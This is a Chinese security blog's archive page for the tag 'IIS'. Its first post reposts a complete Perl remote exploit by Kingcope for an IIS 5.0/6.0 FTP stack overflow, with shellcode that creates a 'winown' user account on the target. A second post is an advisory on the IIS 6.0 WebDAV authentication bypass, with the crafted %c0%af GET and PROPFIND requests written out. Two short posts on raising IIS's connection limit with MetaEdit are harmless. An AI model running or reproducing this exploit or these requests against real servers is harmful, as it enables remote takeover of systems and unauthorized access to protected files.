标签为 "IIS" 的存档

微软IIS5.0/6.0FTP服务远程堆栈溢出漏洞

      Microsoft IIS 5.0/6.0 FTP Server Remote Stack Overflow Exploit (win2k)
      微软IIS5.0/6.0FTP服务远程堆栈溢出漏洞(win2k)

      现在用win2k跑IIS5.0/6.0的服务器估计不多了,2003是主流。
      这个漏洞代码的终极目的是在系统中建立一个以"winown"为用户名,"nwoniw"为密码的账户。
      此漏洞在Windows 2000 SP4上测试通过,影响带有堆栈cookie保护功能的IIS6程序。

复制内容到剪贴板程序代码程序代码
# IIS 5.0 FTPd / Remote r00t exploit
# Win2k SP4 targets
# bug found & exploited by Kingcope, kcope2<at>googlemail.com
# Affects IIS6 with stack cookie protection
# August 2009 – KEEP THIS 0DAY PRIV8
use IO::Socket;
$|=1;
#metasploit shellcode, adduser "winown:nwoniw"
$sc = "\x89\xe2\xda\xde\xd9\x72\xf4\x5b\x53\x59\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .
"\x42\x75\x4a\x49\x4b\x4c\x4a\x48\x50\x44\x43\x30\x43\x30" .
"\x43\x30\x4c\x4b\x47\x35\x47\x4c\x4c\x4b\x43\x4c\x45\x55" .
"\x42\x58\x45\x51\x4a\x4f\x4c\x4b\x50\x4f\x45\x48\x4c\x4b" .
"\x51\x4f\x51\x30\x43\x31\x4a\x4b\x47\x39\x4c\x4b\x47\x44" .
"\x4c\x4b\x43\x31\x4a\x4e\x50\x31\x49\x50\x4c\x59\x4e\x4c" .
"\x4c\x44\x49\x50\x44\x34\x43\x37\x49\x51\x49\x5a\x44\x4d" .
"\x43\x31\x49\x52\x4a\x4b\x4c\x34\x47\x4b\x51\x44\x46\x44" .
"\x43\x34\x43\x45\x4a\x45\x4c\x4b\x51\x4f\x51\x34\x43\x31" .
"\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x4f" .
"\x45\x4c\x45\x51\x4a\x4b\x4c\x4b\x45\x4c\x4c\x4b\x45\x51" .
"\x4a\x4b\x4b\x39\x51\x4c\x46\x44\x44\x44\x48\x43\x51\x4f" .
"\x46\x51\x4c\x36\x43\x50\x50\x56\x45\x34\x4c\x4b\x50\x46" .
"\x50\x30\x4c\x4b\x47\x30\x44\x4c\x4c\x4b\x42\x50\x45\x4c" .
"\x4e\x4d\x4c\x4b\x42\x48\x45\x58\x4d\x59\x4a\x58\x4c\x43" .
"\x49\x50\x43\x5a\x46\x30\x43\x58\x4c\x30\x4c\x4a\x44\x44" .
"\x51\x4f\x43\x58\x4a\x38\x4b\x4e\x4d\x5a\x44\x4e\x50\x57" .
"\x4b\x4f\x4a\x47\x42\x43\x42\x4d\x45\x34\x46\x4e\x42\x45" .
"\x44\x38\x43\x55\x47\x50\x46\x4f\x45\x33\x47\x50\x42\x4e" .
"\x42\x45\x43\x44\x51\x30\x44\x35\x44\x33\x45\x35\x44\x32" .
"\x51\x30\x43\x47\x43\x59\x42\x4e\x42\x4f\x43\x47\x42\x4e" .
"\x51\x30\x42\x4e\x44\x37\x42\x4f\x42\x4e\x45\x39\x43\x47" .
"\x47\x50\x46\x4f\x51\x51\x50\x44\x47\x34\x51\x30\x46\x46" .
"\x51\x36\x51\x30\x42\x4e\x42\x45\x44\x34\x51\x30\x42\x4c" .
"\x42\x4f\x43\x53\x45\x31\x42\x4c\x42\x47\x43\x42\x42\x4f" .
"\x43\x45\x42\x50\x47\x50\x47\x31\x42\x44\x42\x4d\x45\x39" .
"\x42\x4e\x42\x49\x42\x53\x43\x44\x43\x42\x45\x31\x44\x34" .
"\x42\x4f\x43\x42\x43\x43\x47\x50\x42\x57\x45\x39\x42\x4e" .
"\x42\x4f\x42\x57\x42\x4e\x47\x50\x46\x4f\x47\x31\x51\x54" .
"\x51\x54\x43\x30\x41\x41";
#1ca
print "IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2\n";
if ($#ARGV ne 1) {
print "usage: iiz5.pl <target> <your local ip>\n";
exit(0);
}
srand(time());
$port = int(rand(31337-1022)) + 1025;
$locip = $ARGV[1];
$locip =~ s/\./,/gi;
if (fork()) {
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                              PeerPort => '21',
                              Proto    => 'tcp');
$patch = "\x7E\xF1\xFA\x7F";
#$retaddr = "ZZZZ";
$retaddr = "\x9B\xB1\xF4\x77"; # JMP ESP univ on 2 win2k platforms
$v = "KSEXY" . $sc . "V" x (500-length($sc)-5);
# top address of stack frame where shellcode resides, is hardcoded inside this block
$findsc="\xB8\x55\x55\x52\x55\x35\x55\x55\x55\x55\x40\x81\x38\x53"
   ."\x45\x58\x59\x75\xF7\x40\x40\x40\x40\xFF\xFF\xE0";
# attack buffer
$c = $findsc . "C" . ($patch x (76/4)) . $patch.$patch.
   ($patch x (52/4)) .$patch."EEEE$retaddr".$patch.
   "HHHHIIII".
$patch."JKKK"."\xE9\x63\xFE\xFF\xFF\xFF\xFF"."NNNN";
$x = <$sock>;
print $x;                            
print $sock "USER anonymous\r\n";
$x = <$sock>;
print $x;
print $sock "PASS anonymous\r\n";
$x = <$sock>;
print $x;
print $sock "MKD w00t$port\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n"; # We store shellcode in memory of process (stack)
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "CWD w00t$port\r\n";
$x = <$sock>;
print $x;
print $sock "MKD CCC". "$c\r\n";
$x = <$sock>;
print $x;
print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . "\r\n";
$x = <$sock>;
print $x;
# TRIGGER
print $sock "NLST $c*/../C*/\r\n";
$x = <$sock>;
print $x;
while (1) {}
} else {
my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0", LocalPort => $port, Proto => 'tcp', Listen => 1);
die "Could not create socket: $!\n" unless $servsock;
my $new_sock = $servsock->accept();
while(<$new_sock>) {
print $_;
}
close($servsock);
}
#Cheerio,
#
#Kingcope

# milw0rm.com [2009-08-31]

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/98

Microsoft IIS 6.0 WebDAV 远程攻击漏洞代码

archive: http://milw0rm.com/sploits/2009-IIS-Advisory.pdf

   *** FOR IMMEDIATE RELEASE *** *** FOR IMMEDIATE RELEASE ***

Microsoft IIS 6.0 WebDAV Remote Authentication Bypass

Discovered by Kingcope – May 12th, 2009

Affected Vendors

      Microsoft

Affected Products

      Web Server

Vulnerability Details

This vulnerability allows remote attackers to bypass access restrictions on vulnerable installations
of Internet Information Server 6.0.
The specific flaw exists within the WebDAV functionality of IIS 6.0. The Web Server fails to properly
handle unicode tokens when parsing the URI and sending back data. Exploitation of this issue can
result in the following:

         Authentication bypass of password protected folders
         Listing, downloading and uploading of files into a password protected WebDAV folder

Authentication bypass of password protected folders

Assume there is a password protected folder in „d:\inetpub\wwwroot\protected\“. The password
protection mechanism is not relevant for the attack to work. Inside this folder there is a file named
„protected.zip“

The attacker sends a HTTP GET request to the web server.

         GET /  %c0%af/protected/protected.zip HTTP/1.1
         Translate: f
         Connection: close
         Host: servername

As seen above the URI contains the unicode character '/' (%c0%af). This unicode character is
removed in a WebDAV request. „Translate: f“ instructs the web server to handle the request using WebDAV. Using this malicious URI construct the webserver sends the file located at
„/protected/protected.zip“ back to the attacker without asking for proper authentication.
Another valid request an attacker might send to the web server is:

         GET /prot%c0%afected/protected.zip HTTP/1.1
         Translate: f
         Connection: close
         Host: servername

IIS 6.0 will remove the „%c0%af“ unicode character internally from the request and send back the
password protected file without asking for proper credentials.
ASP scripts cannot be downloaded in this way unless serving of script source-code is enabled.

Listing files in a password protected WebDAV folder

The attack on WebDAV folders is similar. The attacker can bypass the access restrictions of the
password protected folder and list, download, upload and modify files.
The attacker sends a PROPFIND request to the web server.

        PROPFIND /protec%c0%afted/ HTTP/1.1
        Host: servername
        User-Agent: neo/0.12.2
        Connection: TE
        TE: trailers
        Depth: 1
        Content-Length: 288
        Content-Type: application/xml
        <?xml version="1.0" encoding="utf-8"?>
        <propfind xmlns="DAV:"><prop>
        <getcontentlength xmlns="DAV:"/>
        <getlastmodified xmlns="DAV:"/>
        <executable xmlns="http://apache.org/dav/props/"/>
        <resourcetype xmlns="DAV:"/>
        <checked-in xmlns="DAV:"/>
        <checked-out xmlns="DAV:"/>
        </prop></propfind>

IIS responds with the directory listing of the folder without asking for a password.

Credit

This vulnerability was discovered by:
        Nikolaos Rangos
        Contact: kcope2@googlemail.com
        Greetings to: alex and andi

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/209

利用MetaEdit修改IIS默认连接数

      如果你安装了IIS在本地架设服务器,调试时应该会遇到多刷新几次就提示http错误超过了连接数的问题。因为IIS默认的连接数只有10,借助微软发布的一款免费工具MetaEdit我们就能轻松修改默认连接数。
      点击这里下载Medabase Edit

      软件运行环境:
      Windows NT4.0及更高版本系统
      IIS4.0及更高版本
      安装完毕启动之后,在主界面左侧依次单击展开“LM→W3SVC”项,然后在右侧的窗口中找到“MaxConnections”键值,双击该键值,打开一个设置对话框,单击“data”后的输入框,如果你的系统是XP或者2000pro将原来的值10修改为40左右。为什么,我改为50、100不可以?因为你的系统不是server(服务器)版本,只有在服务器版本系统上,才能将最大连接数修改到40以上并生效,非服务器版本即使修改到40以上也是无效的。

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/pc-tech/211

IIS连接数改动成功

用Metabase可以轻松修改IIS连接数,原本只能用在WIN2K上,后发现亦可以用在XP PRO上。系统默认值连接数仅为10,在本地调试DV时,多刷新几下就容易超出限制,现在没有这个担忧了。

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/other/568